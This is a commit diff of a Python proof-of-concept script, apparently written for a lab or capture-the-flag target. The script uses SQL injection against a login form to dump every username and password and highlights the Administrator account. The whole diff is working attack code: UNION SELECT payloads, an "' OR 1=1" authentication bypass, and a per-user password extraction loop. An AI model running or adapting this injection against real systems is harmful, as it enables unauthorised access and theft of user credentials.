poc ordering FIXEEEED (looks like i'm getting no sleep today))))))

poc.py

@@ -9,28 +9,31 @@ args = parser.parse_args()
 
 BASE_URL = args.base_url
 
-login_payload = "' UNION SELECT login FROM users--"
+login_payload = "' UNION SELECT login FROM (Select * from users ORDER BY id)--"
 form_data = {"login": login_payload, "password": "' OR 1=1--"}
 response_logins = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
-
-password_payload = "' UNION SELECT password FROM users--"
-form_data = {"login": password_payload, "password": "' OR 1=1--"}
-response_passwords = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
-
 logins_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_logins.text).group(1)
-passwords_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_passwords.text).group(1)
-
 logins= logins_raw.split("',), ('")
-passwords = passwords_raw.split("',), ('")
+
+
+passwords=[]
+for login in logins:
+    password_payload = f"' UNION SELECT password FROM (Select * from users WHERE login='{login}')--"
+    form_data = {"login": password_payload, "password": "' OR 1=1--"}
+    response_password = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
+    password = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_password.text).group(1)
+    passwords.append(password)
 
 
 if logins and passwords:
     for i, (login, password) in enumerate(zip(logins, passwords)):
-        print(f"  {i+1}. Логин: {login:<20} Пароль: {password}")
         if login == "Administrator":
             print(f"{'*' * 60}")
             print(f"  {i+1}. Логин: {login:<20} Пароль: {password}  <-- !!! ВАЖНО !!!")
             print(f"{'*' * 60}")
+        else:
+            print(f"  {i+1}. Логин: {login:<20} Пароль: {password}")
+            
 else:
     print("Не удалось извлечь данные.")